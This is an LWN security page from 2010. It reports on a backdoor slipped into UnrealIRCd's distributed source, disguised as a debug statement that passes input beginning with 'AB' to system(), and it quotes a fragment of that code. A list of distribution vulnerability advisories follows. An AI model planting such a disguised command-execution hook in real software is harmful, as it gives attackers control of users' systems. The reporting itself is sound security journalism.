User: Password:
Subscribe / Log in / New account


A backdoor in UnrealIRCd

By Jake Edge
June 16, 2010

The discovery and announcement of a backdoor in UnrealIRCd is embarrassing for the project, and is certainly a real live security vulnerability. But it is hardly the "proof" that Linux is insecure, or less secure than some other (proprietary) OS, as some pundits would have it. The problem is not Linux-specific, nor is it a problem with free software development, it is, instead, something that could happen—has happened—to any software project.

UnrealIRCd is, as its name implies, an Internet Relay Chat (IRC) server. It runs on most platforms, and has added a number of features that some folks find useful in an IRC server. It is not related to the Unreal first-person shooter game as some reported, it is simply a server that can be run to host IRC channels for a wide variety of purposes.

From what the project can tell, around November 10, 2009 the mirrors of the source distribution of version of UnrealIRCd were replaced with a version that contained a backdoor. That backdoor could be used by an attacker to run any command on a system running the compromised server. That command would, obviously, run with the privileges of the user that executed the server. It took until June 12 for this swap to be noticed, so anyone who picked up a copy of the code in that seven month period may be vulnerable.

The backdoor was disguised to look like a debug statement in the code:

    #ifdef DEBUGMODE3
	   if (!memcmp(readbuf, DEBUGMODE3_INFO, 2))
DEBUG3_LOG eventually resolves to a call to system(), while DEBUGMODE3_INFO is just the string "AB". Thus commands sent to the server that start with "AB" will be handed off directly to system(). Not a particularly sophisticated backdoor, but an effective one nevertheless. As the advisory points out, even servers that are set up to require passwords from users, or even not allow any users at all, are still vulnerable because they still take input.

The official Windows binaries were not affected by the backdoor, but there is no reason that they couldn't have been. The problem is that the project didn't provide any means for verifying the integrity of downloads. That allowed the switch to be made and remain undetected for so long. Since then, the project has started signing its code with GPG keys.

The affected code did make it into Gentoo, which issued an update on the 14th. But the fact that "Linux" was "backdoored" brought out the usual suspects among web pundits eager to declare that it was a watershed moment for Linux security. While it certainly was a black eye for UnrealIRCd, it clearly wasn't one for Linux as a whole. First off, UnrealIRCd is installed on very few Linux systems—it can hardly be considered a core Linux program—and even those where it is installed are likely to be running it as a separate user (e.g. ircd) with fairly low privileges.

But, even users with low privileges often have enough to be useful to attackers. One could imagine spammers and botnet herders finding ways to use the network capabilities of a basic Linux user account. The storage on the system might be useful as well. Unless the user is running the server as root, no direct system compromise should be possible, though it is important to note that a local privilege escalation in the kernel could be used to take the system over.

One of the more laughable claims about the flaw was Ed Bott's declaration that Windows virus scanners would have detected the problem had it impacted those binaries. Bott must be under the impression that virus scanners somehow magically recognize backdoors in executable code. The truth, of course, is much more prosaic: some human finds the malware and updates the signatures that the virus scanners use. Unless this exact vulnerability had already been injected into other Windows binaries—and thus a signature created—no virus scanner would pick it up.

There are certainly lessons to be learned here—integrity checking is important for one—but not those that many of the Windows-centric columnists are pushing. Windows is no more (or less) vulnerable than Linux to these kinds of attacks; when attackers can control the code that you run, it is "game over" no matter what OS you run. It is possible that SELinux, TOMOYO, or AppArmor could mitigate this kind of attack to some extent, but it is somewhat unlikely that anyone has (yet) tackled configuring any of those for a fairly obscure IRC server.

It is another reminder that we need to be more vigilant about protecting our code distribution networks. It may be somewhat less common these days—many folks get their new software from distribution repositories—but grabbing a tarball, untarring, and typing:

    ./configure; make; make install
is a longstanding tradition in the open source world. In order to continue that, it would be very helpful to automatically check signatures when downloading, but the mechanism for doing so is, as yet, unclear. For now, though, checking signatures manually, and being very leery of unsigned code, is the prudent course.

Comments (9 posted)

Brief items

Quotes of the week

Fundamentally a password is something that can have it's value rapidly drop to zero without warning. It doesn't wear out.
-- Russell Coker on password expiration

ENF [Electrical Network Frequency analysis] relies on frequency variations in the electricity supplied by the National Grid. Digital devices such as CCTV recorders, telephone recorders and camcorders that are plugged in to or located near the mains pick up these deviations in the power supply, which are caused by peaks and troughs in demand. Battery-powered devices are not immune to to ENF analysis, as grid frequency variations can be induced in their recordings from a distance.
-- The Register reports on a new forensic technique

Comments (none posted)

Linux Trojan Raises Malware Concerns (PCWorld)

PCWorld looks at a backdoor in Unreal IRC, an Internet relay chat platform for Linux. "An announcement on the Unreal IRCd Forums states "This is very embarrassing...We found out that the Unreal3.2.8.1.tar.gz file on our mirrors has been replaced quite a while ago with a version with a backdoor (trojan) in it. This backdoor allows a person to execute ANY command with the privileges of he user running the ircd. The backdoor can be executed regardless of any user restrictions (so even if you have passworded server or hub that doesn't allow any users in).""

Comments (13 posted)

New vulnerabilities

cacti: SQL injection

Package(s):cacti CVE #(s):CVE-2010-2092
Created:June 14, 2010 Updated:June 17, 2010
Description: From the Debian advisory:

Stefan Esser discovered that cacti, a front-end to rrdtool for monitoring systems and services, is not properly validating input passed to the rra_id parameter of the graph.php script. Due to checking the input of $_REQUEST but using $_GET input in a query an unauthenticated attacker is able to perform SQL injections via a crafted rra_id $_GET value and an additional valid rra_id $_POST or $_COOKIE value.

Gentoo 201401-20 cacti 2014-01-21
Debian DSA-2060-1 cacti 2010-06-13
Mandriva MDVSA-2010:117 cacti 2010-06-16

Comments (1 posted)

dhcp: denial of service

Package(s):dhcp CVE #(s):CVE-2010-2156
Created:June 11, 2010 Updated:June 30, 2010
Description: From the Mandriva advisory:

ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote attackers to cause a denial of service (server exit) via a zero-length client ID.

Fedora FEDORA-2010-9479 dhcp 2010-06-03
Fedora FEDORA-2010-10083 dhcp 2010-06-21
Pardus 2010-87 dhcp 2010-06-24
Fedora FEDORA-2010-9433 dhcp 2010-06-03
Mandriva MDVSA-2010:114 dhcp 2010-06-11

Comments (none posted)

emesene: symlink attack

Package(s):emesene CVE #(s):CVE-2010-2053
Created:June 11, 2010 Updated:June 16, 2010
Description: From the CVE entry:

emesenelib/ in emesene before 1.6.2 allows local users to overwrite arbitrary files via a symlink attack on the emsnpic temporary file.

Fedora FEDORA-2010-9696 emesene 2010-06-08
Fedora FEDORA-2010-9679 emesene 2010-06-08
Fedora FEDORA-2010-9692 emesene 2010-06-08

Comments (none posted)

flash-player: multiple vulnerabilities

Package(s):flash-player CVE #(s):CVE-2008-4546 CVE-2009-3793 CVE-2010-1297 CVE-2010-2160 CVE-2010-2161 CVE-2010-2162 CVE-2010-2163 CVE-2010-2164 CVE-2010-2165 CVE-2010-2166 CVE-2010-2167 CVE-2010-2169 CVE-2010-2170 CVE-2010-2171 CVE-2010-2172 CVE-2010-2173 CVE-2010-2174 CVE-2010-2175 CVE-2010-2176 CVE-2010-2177 CVE-2010-2178 CVE-2010-2179 CVE-2010-2180 CVE-2010-2181 CVE-2010-2182 CVE-2010-2183 CVE-2010-2184 CVE-2010-2185 CVE-2010-2186 CVE-2010-2187 CVE-2010-2188 CVE-2010-2189
Created:June 11, 2010 Updated:January 21, 2011
Description: From the SUSE advisory:

Adobe Flash Player was updated to fix multiple critical security vulnerabilities which allow an attacker to remotely execute arbitrary code or to cause a denial of service.

Gentoo 201101-09 flash-player 2011-01-21
Gentoo 201009-05 acroread 2010-09-07
openSUSE openSUSE-SU-2010:0573-1 acroread 2010-09-01
SUSE SUSE-SA:2010:037 acroread 2010-09-01
SUSE SUSE-SA:2010:034 flash-player 2010-08-13
openSUSE openSUSE-SU-2010:0502-1 flash-player 2010-08-12
openSUSE openSUSE-SU-2010:0359-1 acroread 2010-07-08
Red Hat RHSA-2010:0464-01 flash-plugin 2010-06-11
MeeGo MeeGo-SA-10:10 flash-plugin 2010-07-07
SuSE SUSE-SA:2010:024 flash-player 2010-06-11
Pardus 2010-83 flashplugin 2010-06-24
Red Hat RHSA-2010:0470-01 flash-plugin 2010-06-14
SuSE SUSE-SR:2010:013 apache2-mod_php5/php5, bytefx-data-mysql/mono, flash-player, fuse, java-1_4_2-ibm, krb5, libcmpiutil/libvirt, libmozhelper-1_0-0/mozilla-xulrunner190, libopenssl-devel, libpng12-0, libpython2_6-1_0, libtheora, memcached, ncpfs, pango, puppet, python, seamonkey, te_ams, texlive 2010-06-14

Comments (none posted)

glibc: denial of service

Package(s):glibc CVE #(s):CVE-2009-4880 CVE-2009-4881
Created:June 10, 2010 Updated:November 23, 2010

From the Debian advisory:

Maksymilian Arciemowicz discovered that the GNU C library did not correctly handle integer overflows in the strfmon family of functions. If a user or automated system were tricked into processing a specially crafted format string, a remote attacker could crash applications, leading to a denial of service.

Gentoo 201011-01 glibc 2010-11-15
Debian DSA-2058-1 glibc 2010-06-10

Comments (none posted)

moin: cross-site scripting

Package(s):moin CVE #(s):
Created:June 14, 2010 Updated:June 29, 2010
Description: From the Red Hat bugzilla:

A possible reflected cross-site scripting attack was discovered in Moin. An attacker able to cause a user to follow a specially crafted malicious link may be able to recover session identifiers or exploit browser vulnerabilities, due to a vulnerable template parameter. The upstream bug report links to patches to correct the flaw.

Fedora FEDORA-2010-10550 moin 2010-06-29
Fedora FEDORA-2010-9857 moin 2010-06-14
Fedora FEDORA-2010-9876 moin 2010-06-14

Comments (none posted)

mono: cross-site scripting

Package(s):mono CVE #(s):CVE-2010-1459
Created:June 15, 2010 Updated:July 26, 2012
Description: From the Pardus advisory:

The default configuration of ASP.NET in Mono before 2.6.4 has a value of FALSE for the EnableViewStateMac property, which allows remote attackers to conduct cross-site scripting (XSS) attacks, as demonstrated by the __VIEWSTATE parameter to 2.0/menu/menu1.aspx in the XSP sample project.

Ubuntu USN-1517-1 mono 2012-07-25
SUSE SUSE-SR:2010:014 OpenOffice_org, apache2-slms, aria2, bogofilter, cifs-mount/samba, clamav, exim, ghostscript-devel, gnutls, krb5, kvirc, lftp, libpython2_6-1_0, libtiff, libvorbis, lxsession, mono-addon-bytefx-data-mysql/bytefx-data-mysql, moodle, openldap2, opera, otrs, popt, postgresql, python-mako, squidGuard, vte, w3m, xmlrpc-c, XFree86/xorg-x11, yast2-webclient 2010-08-02
Fedora FEDORA-2010-10332 xsp 2010-06-24
Pardus 2010-79 mono-web mono-runtime mono-jscript 2010-06-15
Fedora FEDORA-2010-10332 mod_mono 2010-06-24
Fedora FEDORA-2010-10332 mono-basic 2010-06-24
Fedora FEDORA-2010-10332 gtksourceview-sharp 2010-06-24
Fedora FEDORA-2010-10332 libgdiplus 2010-06-24
Fedora FEDORA-2010-10332 mono-tools 2010-06-24
Fedora FEDORA-2010-10332 gnome-sharp 2010-06-24
Fedora FEDORA-2010-10433 mono 2010-06-28
Fedora FEDORA-2010-10332 mono 2010-06-24

Comments (none posted)

openssl: arbitrary code execution

Package(s):openssl CVE #(s):CVE-2010-0742
Created:June 15, 2010 Updated:June 22, 2010
Description: From the Pardus advisory:

The Cryptographic Message Syntax (CMS) implementation in crypto/cms/cms_asn1.c in OpenSSL before 0.9.8o and 1.x before 1.0.0a does not properly handle structures that contain OriginatorInfo, which allows context-dependent attackers to modify invalid memory locations or conduct double-free attacks, and possibly execute arbitrary code, via unspecified vectors.

Gentoo 201110-01 openssl 2011-10-09
Fedora FEDORA-2010-9639 openssl 2010-06-07
Fedora FEDORA-2010-9421 openssl 2010-06-02
Pardus 2010-77 openssl 2010-06-15
Fedora FEDORA-2010-9574 openssl 2010-06-07

Comments (none posted)

openssl: information leak

Package(s):openssl CVE #(s):CVE-2010-1633
Created:June 15, 2010 Updated:June 16, 2010
Description: From the CVE entry:

RSA verification recovery in the EVP_PKEY_verify_recover function in OpenSSL 1.x before 1.0.0a, as used by pkeyutl and possibly other applications, returns uninitialized memory upon failure, which might allow context-dependent attackers to bypass intended key requirements or obtain sensitive information via unspecified vectors. NOTE: some of these details are obtained from third party information.

Gentoo 201110-01 openssl 2011-10-09
Fedora FEDORA-2010-9574 openssl 2010-06-07
Fedora FEDORA-2010-9639 openssl 2010-06-07

Comments (none posted)

pcsc-lite: privilege escalation

Package(s):pcsc-lite CVE #(s):CVE-2010-0407
Created:June 11, 2010 Updated:September 24, 2010
Description: From the Debian advisory:

It was discovered that PCSCD, a daemon to access smart cards, was vulnerable to a buffer overflow allowing a local attacker to elevate his privileges to root.

Mandriva MDVSA-2010:189-1 pcsc-lite 2010-09-24
Mandriva MDVSA-2010:189 pcsc-lite 2010-09-24
SUSE SUSE-SR:2010:017 java-1_4_2-ibm, sudo, libpng, php5, tgt, iscsitarget, aria2, pcsc-lite, tomcat5, tomcat6, lvm2, libvirt, rpm, libtiff, dovecot12 2010-09-21
openSUSE openSUSE-SU-2010:0612-1 pcsc-lite 2010-09-15
SUSE SUSE-SR:2010:015 gpg2, krb5, kvirc, libpcsclite1/pcsc-lite, libpython2_6-1_0, libvorbis, libwebkit, squidGuard, strongswan 2010-08-17
openSUSE openSUSE-SU-2010:0500-1 pcsc-lite 2010-08-12
Ubuntu USN-969-1 pcsc-lite 2010-08-05
CentOS CESA-2010:0533 pcsc-lite 2010-07-15
Fedora FEDORA-2010-10764 pcsc-lite 2010-07-06
Debian DSA-2059-2 pcsc-lite 2010-07-04
Fedora FEDORA-2010-10014 pcsc-lite 2010-06-16
Fedora FEDORA-2010-9995 pcsc-lite 2010-06-16
Red Hat RHSA-2010:0533-01 pcsc-lite 2010-07-14
Debian DSA-2059-1 pcsc-lite 2010-06-10

Comments (none posted)

python: multiple vulnerabilities

Package(s):python CVE #(s):CVE-2010-1634 CVE-2010-2089 CVE-2008-5983
Created:June 14, 2010 Updated:October 25, 2012
Description: From the CVE entries:

Multiple integer overflows in audioop.c in the audioop module in Python 2.6, 2.7, 3.1, and 3.2 allow context-dependent attackers to cause a denial of service (application crash) via a large fragment, as demonstrated by a call to audioop.lin2lin with a long string in the first argument, leading to a buffer overflow. NOTE: this vulnerability exists because of an incorrect fix for CVE-2008-3143.5. (CVE-2010-1634)

The audioop module in Python 2.7 and 3.2 does not verify the relationships between size arguments and byte string lengths, which allows context-dependent attackers to cause a denial of service (memory corruption and application crash) via crafted arguments, as demonstrated by a call to audioop.reverse with a one-byte string, a different vulnerability than CVE-2010-1634. (CVE-2010-2089)

Untrusted search path vulnerability in the PySys_SetArgv API function in Python 2.6 and earlier, and possibly later versions, prepends an empty string to sys.path when the argv[0] argument does not contain a path separator, which might allow local users to execute arbitrary code via a Trojan horse Python file in the current working directory. (CVE-2008-5983)

Gentoo 201401-04 python 2014-01-07
Ubuntu USN-1613-1 python2.5 2012-10-17
Ubuntu USN-1613-2 python2.4 2012-10-17
Ubuntu USN-1616-1 python3.1 2012-10-24
Ubuntu USN-1596-1 python2.6 2012-10-04
CentOS CESA-2011:0491 python 2011-05-05
Red Hat RHSA-2011:0491-01 python 2011-05-05
SUSE SUSE-SR:2011:002 ed, evince, hplip, libopensc2/opensc, libsmi, libwebkit, perl, python, sssd, sudo, wireshark 2011-01-25
SUSE SUSE-SR:2010:024 clamav, subversion, python, krb5, otrs, moonlight, OpenOffice_org, kdenetwork4, zope, xpdf, gnutls, and opera 2010-12-23
Red Hat RHSA-2011:0027-01 python 2011-01-13
openSUSE openSUSE-SU-2010:1049-1 python 2010-12-13
Fedora FEDORA-2010-13388 python3 2010-08-23
MeeGo MeeGo-SA-10:16 python 2010-08-03
Fedora FEDORA-2010-9652 python 2010-06-07
Fedora FEDORA-2010-9565 python 2010-06-07
Mandriva MDVSA-2010:132 python 2010-07-14
Pardus 2010-76 python 2010-06-15

Comments (none posted)

samba: denial of service

Package(s):samba CVE #(s):
Created:June 15, 2010 Updated:June 16, 2010
Description: From the Pardus advisory:

The Server Message Block (SMB) protocol, also known as Common Internet File System (CIFS) acts as an application-layer protocol to provide shared access to files, printers and Inter-Process Communication (IPC). It is also a transport for Distributed Computing Environment / Remote Procedure Call (DCE / RPC) operations After negotiating an SMB communication the client sends a 'Session Setup AndX' packet to negotiate a session in order to be able to connect on a specific share. IT is possible to trigger an uninitialized variable read by sending a specific 'Sessions Setup AndX' query. Successful exploitation of the issue will result in a denial of service.

Pardus 2010-78 samba 2010-06-15

Comments (none posted)

samba: arbitrary code execution

Package(s):samba CVE #(s):CVE-2010-2063
Created:June 16, 2010 Updated:October 18, 2010

From the Ubuntu advisory:

Jun Mao discovered that Samba did not correctly validate SMB1 packet contents. An unauthenticated remote attacker could send specially crafted network traffic that could execute arbitrary code as the root user.

Gentoo 201206-22 samba 2012-06-24
SUSE SUSE-SU-2012:0348-1 Samba 2012-03-09
rPath rPSA-2010-0066-1 samba 2010-10-17
CentOS CESA-2010:0488 samba 2010-08-16
SUSE SUSE-SR:2010:014 OpenOffice_org, apache2-slms, aria2, bogofilter, cifs-mount/samba, clamav, exim, ghostscript-devel, gnutls, krb5, kvirc, lftp, libpython2_6-1_0, libtiff, libvorbis, lxsession, mono-addon-bytefx-data-mysql/bytefx-data-mysql, moodle, openldap2, opera, otrs, popt, postgresql, python-mako, squidGuard, vte, w3m, xmlrpc-c, XFree86/xorg-x11, yast2-webclient 2010-08-02
Slackware SSA:2010-169-01 samba 2010-06-21
Red Hat RHSA-2010:0488-01 samba 2010-06-16
CentOS CESA-2010:0488 samba 2010-06-19
Mandriva MDVSA-2010:119 samba 2010-06-17
Debian DSA-2061-1 samba 2010-06-16
CentOS CESA-2010:0488 samba 2010-07-21
Pardus 2010-91 samba 2010-06-30
Ubuntu USN-951-1 samba 2010-06-16
SuSE SUSE-SA:2010:025 samba 2010-07-01

Comments (none posted)

sudo: privilege escalation

Package(s):sudo CVE #(s):CVE-2010-1646
Created:June 15, 2010 Updated:January 25, 2011
Description: From the Pardus advisory:

The secure path feature in env.c in sudo 1.3.1 through 1.6.9p22 and 1.7.0 through 1.7.2p6 does not properly handle an environment that contains multiple PATH variables, which might allow local users to gain privileges via a crafted value of the last PATH variable.

SUSE SUSE-SR:2011:002 ed, evince, hplip, libopensc2/opensc, libsmi, libwebkit, perl, python, sssd, sudo, wireshark 2011-01-25
openSUSE openSUSE-SU-2011:0050-1 sudo 2011-01-19
rPath rPSA-2010-0075-1 sudo 2010-10-27
Gentoo 201009-03 sudo 2010-09-07
Fedora FEDORA-2010-9415 sudo 2010-06-02
CentOS CESA-2010:0475 sudo 2010-06-16
Red Hat RHSA-2010:0475-01 sudo 2010-06-15
Mandriva MDVSA-2010:118 sudo 2010-06-17
Debian DSA-2062-1 sudo 2010-06-17
Fedora FEDORA-2010-9402 sudo 2010-06-02
Pardus 2010-80 sudo 2010-06-15
MeeGo MeeGo-SA-10:06 sudo 2010-07-07
Ubuntu USN-956-1 sudo 2010-06-30
Fedora FEDORA-2010-9417 sudo 2010-06-02

Comments (none posted)

tiff: arbitrary code execution

Package(s):tiff CVE #(s):
Created:June 15, 2010 Updated:June 16, 2010
Description: From the Pardus advisory:

Multiple integer overflows in the handling of TIFF files may result in a heap buffer overflow. Opening a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution. These issues are addressed through improved bounds checking. Credit to Kevin Finisterre of for reporting this issue.

Pardus 2010-81 tiff 2010-06-15

Comments (none posted)

unrealircd: multiple vulnerabilities

Package(s):unrealircd CVE #(s):
Created:June 15, 2010 Updated:June 16, 2010
Description: From the Gentoo advisory:

Multiple vulnerabilities have been reported in UnrealIRCd:

* The vendor reported a buffer overflow in the user authorization code.

* The vendor reported that the distributed source code of UnrealIRCd was compromised and altered to include a system() call that could be called with arbitrary user input.

A remote attacker could exploit these vulnerabilities to cause the execution of arbitrary commands with the privileges of the user running UnrealIRCd, or a Denial of Service condition.

Gentoo 201006-21 unrealircd 2010-06-14

Comments (none posted)

wireshark: multiple vulnerabilities

Package(s):wireshark CVE #(s):
Created:June 10, 2010 Updated:June 16, 2010

From the wireshark advisory:

The SMB dissector could dereference a NULL pointer. (Bug 4734) Versions affected: 0.99.6 to 1.0.13, 1.2.0 to 1.2.8

J. Oquendo discovered that the ASN.1 BER dissector could overrun the stack. Versions affected: 0.10.13 to 1.0.13, 1.2.0 to 1.2.8

The SMB PIPE dissector could dereference a NULL pointer on some platforms. Versions affected: 0.8.20 to 1.0.13, 1.2.0 to 1.2.8

The SigComp Universal Decompressor Virtual Machine could go into an infinite loop. (Bug 4826) Versions affected: 0.10.7 to 1.0.13, 1.2.0 to 1.2.8

The SigComp Universal Decompressor Virtual Machine could overrun a buffer. (Bug 4837) Versions affected: 0.10.8 to 1.0.13, 1.2.0 to 1.2.8

Mandriva MDVSA-2010:113 wireshark 2010-06-10

Comments (none posted)

Page editor: Jake Edge
Next page: Kernel development>>

Copyright © 2010, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds